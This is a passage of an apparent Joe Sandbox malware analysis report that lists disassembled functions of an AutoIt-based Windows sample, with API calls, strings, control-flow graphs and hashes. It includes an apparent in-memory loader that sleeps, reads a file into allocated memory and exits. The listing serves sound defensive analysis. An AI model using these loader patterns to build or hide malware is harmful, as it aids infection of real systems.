                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: cef6b74faffd19b28c42e65548128301a562a178155ac8a1785c9cb5862d215f
                                                  • Instruction ID: e8c73226940fd695e4f49ccfeb5bb617bc6f8a74cb086ad02238a0a976ec4d78
                                                  • Opcode Fuzzy Hash: cef6b74faffd19b28c42e65548128301a562a178155ac8a1785c9cb5862d215f
                                                  • Instruction Fuzzy Hash: F5C14CB1D00229AADF21DFA5DC85EDEBBBDEF45310F0040AAF609E7151DB709A848F65
                                                  Function 00BC708B Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00BC4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,(l,?,00BC37AE,?), ref: 00BC4724
                                                    • Part of subcall function 00BE050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BC7165), ref: 00BE052D
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BC71A8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BFE8C8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BFE909
                                                  • RegCloseKey.ADVAPI32(?), ref: 00BFE947
                                                  • _wcscat.LIBCMT ref: 00BFE9A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$U
                                                  • API String ID: 2673923337-1615094722
                                                  • Opcode ID: e78a57e17c97f4189cdb9666c1403d753f6936db033d3ab304375eb9da25c7a9
                                                  • Instruction ID: 23299457bd91268dcfa17f7599a5fc747e403c8de990f3e8891d48ae5aa55fb7
                                                  • Opcode Fuzzy Hash: e78a57e17c97f4189cdb9666c1403d753f6936db033d3ab304375eb9da25c7a9
                                                  • Instruction Fuzzy Hash: A77169715083059AC710EF25EC81B6FBBE8FF89350F4049AEF545871A0DB71A949CBA6
                                                  Function 00BC3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BC309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BC30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 6e7ab06ca50c8db9005647b9cb3b967ee3a4ae1aa5ff87b415ff5bef25d4cac4
                                                  • Instruction ID: 66a58577e0a97d7b09fd14313741c2aee6c578a7b0b9849a011117e8b647233b
                                                  • Opcode Fuzzy Hash: 6e7ab06ca50c8db9005647b9cb3b967ee3a4ae1aa5ff87b415ff5bef25d4cac4
                                                  • Instruction Fuzzy Hash: 113126B6D41208EFDB10CFA4E888BDEBBF0FB09314F14412EE580A62A1D7B54586CF95
                                                  Function 00BC3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BC309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BC30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 448990871da013200c589cb4dd8f2c6191b668ce0a8b9e41445323f81bb85b96
                                                  • Instruction ID: 9cd2d3e9a4c7955cc70fd92fbb07dedc0f1badb1ac1f774f37890b04634c4fe6
                                                  • Opcode Fuzzy Hash: 448990871da013200c589cb4dd8f2c6191b668ce0a8b9e41445323f81bb85b96
                                                  • Instruction Fuzzy Hash: 7321D6B9D51218AFDB00DFA4EC89BDEBBF4FB09700F00412AF910A62A0D7B54545CF95
                                                  Function 00BC3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3A50
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00BC3A5F
                                                  • LoadIconW.USER32(00000063), ref: 00BC3A76
                                                  • LoadIconW.USER32(000000A4), ref: 00BC3A88
                                                  • LoadIconW.USER32(000000A2), ref: 00BC3A9A
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC3AC0
                                                  • RegisterClassExW.USER32(?), ref: 00BC3B16
                                                    • Part of subcall function 00BC3041: GetSysColorBrush.USER32(0000000F), ref: 00BC3074
                                                    • Part of subcall function 00BC3041: RegisterClassExW.USER32(00000030), ref: 00BC309E
                                                    • Part of subcall function 00BC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
                                                    • Part of subcall function 00BC3041: InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
                                                    • Part of subcall function 00BC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
                                                    • Part of subcall function 00BC3041: LoadIconW.USER32(000000A9), ref: 00BC30F2
                                                    • Part of subcall function 00BC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 62c4d82277dfead568aa08beb07c6a068be2cbabea8fc931a0a4fbb4441925c2
                                                  • Instruction ID: a3f1ae5c7168d0b252a4f6de86c6b78c53c243a0af8776d7e7b36f21f60e9d26
                                                  • Opcode Fuzzy Hash: 62c4d82277dfead568aa08beb07c6a068be2cbabea8fc931a0a4fbb4441925c2
                                                  • Instruction Fuzzy Hash: 33213575900308AFEB10DFA4EC49B9D7BF0FB09711F00416AE500AA2A1DBB95A508F88
                                                  Function 00BC3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: (l$/AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3920092937
                                                  • Opcode ID: e5a32b8e116c40df0db642be7e5114e79aa54e8d53018545efcad2402d803ef9
                                                  • Instruction ID: 3e2f363b0e45fde1eb0d442e02c759501e98cf247aee27fcc03aded67995d445
                                                  • Opcode Fuzzy Hash: e5a32b8e116c40df0db642be7e5114e79aa54e8d53018545efcad2402d803ef9
                                                  • Instruction Fuzzy Hash: 70A1397290022D9ADB14EBA0DC95FEEB7F9BF14710F4044ADE416B7191DF745A08CBA0
                                                  Function 00BC3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 885 bc3633-bc3681 887 bc36e1-bc36e3 885->887 888 bc3683-bc3686 885->888 887->888 891 bc36e5 887->891 889 bc3688-bc368f 888->889 890 bc36e7 888->890 892 bc374b-bc3753 PostQuitMessage 889->892 893 bc3695-bc369a 889->893 895 bc36ed-bc36f0 890->895 896 bfd0cc-bfd0fa call bd1070 call bd1093 890->896 894 bc36ca-bc36d2 DefWindowProcW 891->894 900 bc3711-bc3713 892->900 898 bfd154-bfd168 call c22527 893->898 899 bc36a0-bc36a2 893->899 901 bc36d8-bc36de 894->901 902 bc3715-bc373c SetTimer RegisterWindowMessageW 895->902 903 bc36f2-bc36f3 895->903 931 bfd0ff-bfd106 896->931 898->900 924 bfd16e 898->924 907 bc36a8-bc36ad 899->907 908 bc3755-bc375f call bc44a0 899->908 900->901 902->900 909 bc373e-bc3749 CreatePopupMenu 902->909 904 bfd06f-bfd072 903->904 905 bc36f9-bc370c KillTimer call bc443a call bc3114 903->905 917 bfd0a8-bfd0c7 MoveWindow 904->917 918 bfd074-bfd076 904->918 905->900 913 bfd139-bfd140 907->913 914 bc36b3-bc36b8 907->914 925 bc3764 908->925 909->900 913->894 920 bfd146-bfd14f call c17c36 913->920 922 bc36be-bc36c4 914->922 923 bfd124-bfd134 call c22d36 914->923 917->900 926 bfd078-bfd07b 918->926 927 bfd097-bfd0a3 SetFocus 918->927 920->894 922->894 922->931 923->900 924->894 925->900 926->922 932 bfd081-bfd092 call bd1070 926->932 927->900 931->894 935 bfd10c-bfd11f call bc443a call bc434a 931->935 932->900 935->894
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00BC36D2
                                                  • KillTimer.USER32(?,00000001), ref: 00BC36FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC371F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC372A
                                                  • CreatePopupMenu.USER32 ref: 00BC373E
                                                  • PostQuitMessage.USER32(00000000), ref: 00BC374D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 5eee9def25b6d725fc95b3a94a463c6fda1a6f754011148a38add33056687a5f
                                                  • Instruction ID: 5d05e1d8342a7b7ce4431e9bb92dc21f8e930661392eba64614918e40703064a
                                                  • Opcode Fuzzy Hash: 5eee9def25b6d725fc95b3a94a463c6fda1a6f754011148a38add33056687a5f
                                                  • Instruction Fuzzy Hash: 564166F1204509BBCB106F78EC49F7D37E5EB01700F9481BEF602922A1CEA49E0593A9
                                                  Function 00F5C5E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 942 f5c5e0-f5c68e call f59fb0 945 f5c695-f5c6bb call f5d4f0 CreateFileW 942->945 948 f5c6c2-f5c6d2 945->948 949 f5c6bd 945->949 957 f5c6d4 948->957 958 f5c6d9-f5c6f3 VirtualAlloc 948->958 950 f5c80d-f5c811 949->950 951 f5c853-f5c856 950->951 952 f5c813-f5c817 950->952 954 f5c859-f5c860 951->954 955 f5c823-f5c827 952->955 956 f5c819-f5c81c 952->956 959 f5c8b5-f5c8ca 954->959 960 f5c862-f5c86d 954->960 961 f5c837-f5c83b 955->961 962 f5c829-f5c833 955->962 956->955 957->950 963 f5c6f5 958->963 964 f5c6fa-f5c711 ReadFile 958->964 967 f5c8cc-f5c8d7 VirtualFree 959->967 968 f5c8da-f5c8e2 959->968 965 f5c871-f5c87d 960->965 966 f5c86f 960->966 969 f5c83d-f5c847 961->969 970 f5c84b 961->970 962->961 963->950 971 f5c713 964->971 972 f5c718-f5c758 VirtualAlloc 964->972 975 f5c891-f5c89d 965->975 976 f5c87f-f5c88f 965->976 966->959 967->968 969->970 970->951 971->950 973 f5c75f-f5c77a call f5d740 972->973 974 f5c75a 972->974 982 f5c785-f5c78f 973->982 974->950 979 f5c89f-f5c8a8 975->979 980 f5c8aa-f5c8b0 975->980 978 f5c8b3 976->978 978->954 979->978 980->978 983 f5c791-f5c7c0 call f5d740 982->983 984 f5c7c2-f5c7d6 call f5d550 982->984 983->982 990 f5c7d8 984->990 991 f5c7da-f5c7de 984->991 990->950 992 f5c7e0-f5c7e4 CloseHandle 991->992 993 f5c7ea-f5c7ee 991->993 992->993 994 f5c7f0-f5c7fb VirtualFree 993->994 995 f5c7fe-f5c807 993->995 994->995 995->945 995->950
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F5C6B1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F5C8D7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                  • Instruction ID: 8cb1ea0bcf9927bbab911f76b3e997b0b1b022d64ffd5048fa480bb12183c4c7
                                                  • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                  • Instruction Fuzzy Hash: 1EA12B75E00209EFDB14CFA4C894BEEBBB5BF48316F208159E606BB280D7759A44DF94
                                                  Function 00BC39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1073 bc39d5-bc3a45 CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC3A03
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC3A24
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BC3A38
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BC3A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: ff51f3862eb542791ecba0ea9a83c4188bb18872ec60251be2025153513e8439
                                                  • Instruction ID: de4e66624f790a0a6a82ce3cb8c050e68532b04bd68a3c834e95eb52e2a45658
                                                  • Opcode Fuzzy Hash: ff51f3862eb542791ecba0ea9a83c4188bb18872ec60251be2025153513e8439
                                                  • Instruction Fuzzy Hash: 5BF03A745402907EEA3157236C08F2F3E7DE7C7F50B01003EB900A2170CAA50801DBB4
                                                  Function 00F5C360 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1074 f5c360-f5c4e2 call f59fb0 call f5c250 CreateFileW 1081 f5c4e4 1074->1081 1082 f5c4e9-f5c4f9 1074->1082 1083 f5c599-f5c59e 1081->1083 1085 f5c500-f5c51a VirtualAlloc 1082->1085 1086 f5c4fb 1082->1086 1087 f5c51c 1085->1087 1088 f5c51e-f5c535 ReadFile 1085->1088 1086->1083 1087->1083 1089 f5c537 1088->1089 1090 f5c539-f5c573 call f5c290 call f5b250 1088->1090 1089->1083 1095 f5c575-f5c58a call f5c2e0 1090->1095 1096 f5c58f-f5c597 ExitProcess 1090->1096 1095->1096 1096->1083
                                                  APIs
                                                    • Part of subcall function 00F5C250: Sleep.KERNELBASE(000001F4), ref: 00F5C261
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F5C4D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: F7HPED9HIFI2CQLSTYCEG5PTQKMA
                                                  • API String ID: 2694422964-3962159092
                                                  • Opcode ID: 699dbaeb7620f88dd32467395bf0ecb549d3de4345e35a353a8846fa059b9930
                                                  • Instruction ID: cebc7a0c267c23e864d1b3fe683ae436594880a46106187491fb227daf51cd16
                                                  • Opcode Fuzzy Hash: 699dbaeb7620f88dd32467395bf0ecb549d3de4345e35a353a8846fa059b9930
                                                  • Instruction Fuzzy Hash: 28719270D04388DAEF11DBE4C8447EEBB75AF19304F044199E649BB2C1D7BA1B48DBA6
                                                  Function 00C2955B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1098 c2955b-c295de call bc4ee5 call c29734 1103 c295e0 1098->1103 1104 c295e8-c29656 call bc4f0b * 4 call bc4ee5 call be571c 1098->1104 1105 c295e2-c295e3 1103->1105 1118 c2965b-c2969f call be571c call bc4f0b call c29109 call c28953 1104->1118 1107 c2972b-c29731 1105->1107 1127 c296a1-c296b1 call be2d55 * 2 1118->1127 1128 c296b6-c296ba 1118->1128 1127->1105 1129 c2971b-c29721 call be2d55 1128->1129 1130 c296bc-c29719 call c28b06 call be2d55 1128->1130 1140 c29723-c29729 1129->1140 1130->1140 1140->1107
                                                  APIs
                                                    • Part of subcall function 00BC4EE5: _fseek.LIBCMT ref: 00BC4EFD
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29824
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29837
                                                  • _free.LIBCMT ref: 00C296A2
                                                  • _free.LIBCMT ref: 00C296A9
                                                  • _free.LIBCMT ref: 00C29714
                                                    • Part of subcall function 00BE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00BE9A24), ref: 00BE2D69
                                                    • Part of subcall function 00BE2D55: GetLastError.KERNEL32(00000000,?,00BE9A24), ref: 00BE2D7B
                                                  • _free.LIBCMT ref: 00C2971C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID: (l
                                                  • API String ID: 1552873950-844116408
                                                  • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                  • Instruction ID: 1dbc0f9dad572c16c1e8fcf8e638d7cd6464014bb0f8c74132723d8f70b4a445
                                                  • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                  • Instruction Fuzzy Hash: 54515FB1D04268AFDF249F65DC81A9EBBB9EF48300F1044EEF609A3241DB715A90CF58
                                                  Function 00BC407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1142 bc407c-bc4092 1143 bc416f-bc4173 1142->1143 1144 bc4098-bc40ad call bc7a16 1142->1144 1147 bfd3c8-bfd3d7 LoadStringW 1144->1147 1148 bc40b3-bc40d3 call bc7bcc 1144->1148 1151 bfd3e2-bfd3fa call bc7b2e call bc6fe3 1147->1151 1148->1151 1152 bc40d9-bc40dd 1148->1152 1161 bc40ed-bc416a call be2de0 call bc454e call be2dbc Shell_NotifyIconW call bc5904 1151->1161 1163 bfd400-bfd41e call bc7cab call bc6fe3 call bc7cab 1151->1163 1154 bc4174-bc417d call bc8047 1152->1154 1155 bc40e3-bc40e8 call bc7b2e 1152->1155 1154->1161 1155->1161 1161->1143 1163->1161
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BFD3D7
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • _memset.LIBCMT ref: 00BC40FC
                                                  • _wcscpy.LIBCMT ref: 00BC4150
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC4160
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: ac42abd6d244efb1ad2818f865b8b2d7ca2112ec77842beeed2b9509c0cdac45
                                                  • Instruction ID: 9438e63dfc69af317b6ac560b0dc96c0235a1e986de4ed7992c879bb29ad95f0
                                                  • Opcode Fuzzy Hash: ac42abd6d244efb1ad2818f865b8b2d7ca2112ec77842beeed2b9509c0cdac45
                                                  • Instruction Fuzzy Hash: C8319C71048705AFD321EB60DC56FEF77E8AF54314F1049AEF685920A1EFB0A648CB96
                                                  Function 00BC686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                  Download Yara Rule
                                                  APIs
